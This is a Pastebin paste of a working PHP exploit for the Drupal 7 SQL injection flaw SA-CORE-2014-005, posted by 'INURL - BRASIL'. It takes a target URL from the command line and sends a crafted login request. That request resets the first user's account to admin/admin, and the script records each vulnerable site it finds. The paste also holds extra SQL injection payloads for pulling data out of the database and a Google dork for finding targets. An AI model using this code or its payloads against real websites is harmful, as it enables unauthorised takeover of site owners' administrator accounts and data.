API tools faq
paste
Advertisement
Googleinurl

[EXPLOIT] Drupal 7.x SQL Injection / INURL - BRASIL

Googleinurl
Feb 7th, 2015
5,737
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.39 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /* Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
  4.   ----------------------------------------------------------
  5.  * Drupal 7 SQL Injection vulnerability demo
  6.  * Read more at http://milankragujevic.com/post/66
  7.  * This will change the first user's username to admin
  8.  * and their password to admin
  9.  * Change $url to the website URL
  10.   ----------------------------------------------------------
  11.  * EXTRA INFO:
  12.  * http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
  13.  * http://pastebin.com/nDwLFV3v
  14.  * https://www.youtube.com/watch?v=rHwJYD_yTlM
  15.  * DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  16.   ----------------------------------------------------------
  17.  * Script exploit developed by INURL - BRAZIL
  18.  * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  19.  * EMAIL*: [email protected]
  20.  * Blog*: http://blog.inurl.com.br
  21.  * Twitter*: https://twitter.com/googleinurl
  22.  * Fanpage*: https://fb.com/InurlBrasil
  23.  * GIT*: https://github.com/googleinurl
  24.  * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  25.  * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  26.   ----------------------------------------------------------
  27.  *
  28.  * DORK: " Powered by Drupal" inurl:"user/register"
  29.  *
  30.  */
  31.  
  32. error_reporting(1);
  33. set_time_limit(0);
  34. ini_set('display_errors', 1);
  35. ini_set('max_execution_time', 0);
  36. ini_set('allow_url_fopen', 1);
  37. ob_implicit_flush(true);
  38. ob_end_flush();
  39. //echo '<pre>';
  40.  
  41. $params['url'] = isset($argv[1]) && !empty($argv[1]) ? $argv[1] : exit("SET TARGET URL ex: php exploitDrupal7.php http://target.com save.txt");
  42. $params['output'] = isset($argv[2]) && !empty($argv[2]) ? $argv[2] : 'OUTPUT_INURL_DRUPAL7.txt';
  43. $params['post'] = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  44. $params['url_request'] = '?q=node&destination=node';
  45.  
  46.  
  47. //EXEMPLE INJECTIONS - http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
  48. //
  49. //users passwords:
  50. $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  51.  
  52. //select information_schema.tables:
  53. $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select md5(1122) from
  54. information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed&
  55. removed=removed&form_build_id=&form_id=user_login_block&op=Log+in";
  56.  
  57. function __request($params) {
  58.  
  59.     $objcurl = curl_init();
  60.     curl_setopt($objcurl, CURLOPT_URL, $params['url'] . $params['url_request']);
  61.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  62.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  63.     curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
  64.         'Content-Type: application/x-www-form-urlencoded',
  65.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  66.         'Accept: application/json, text/javascript, */*; q=0.01',
  67.         'X-Requested-With: XMLHttpRequest',
  68.         "Referer: {$params['url']}",
  69.         'Accept-Language: en-US,en;q=0.5',
  70.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  71.     ));
  72.     curl_setopt($objcurl, CURLOPT_REFERER, $params['url'] . $params['url_request']);
  73.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);
  74.  
  75.     $corpo = curl_exec($objcurl);
  76.     curl_close($objcurl);
  77.  
  78.     if (stristr($corpo, 'mb_strlen() expects parameter 1 to be string') && $corpo) {
  79.         echo "[INFO]: VULNERABLE! Log in with username \"admin\" and password \"admin\" at {$params['url']}/user/login \n";
  80.         echo "[INFO][OUTPUT]: {$params['output']}\n";
  81.         $output = "-------------------------------------\n";
  82.         $output.= "[INFO][URL]: {$params['url']}/user/login\n";
  83.         $output.= "[INFO][LOGIN]: admin / pass: admin\n";
  84.         $output.= "[INFO][DATE]: " . date("d-m-Y H:i:s");
  85.         $output.= "\n-------------------------------------\n\n";
  86.         echo $output;
  87.         file_put_contents($params['output'], $output, FILE_APPEND);
  88.     } else {
  89.         echo "[INFO]: NOT Vulnerable , or your Internet isn't working. \n\n";
  90.     }
  91. }
  92.  
  93. //EXECUT...
  94. __request($params);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!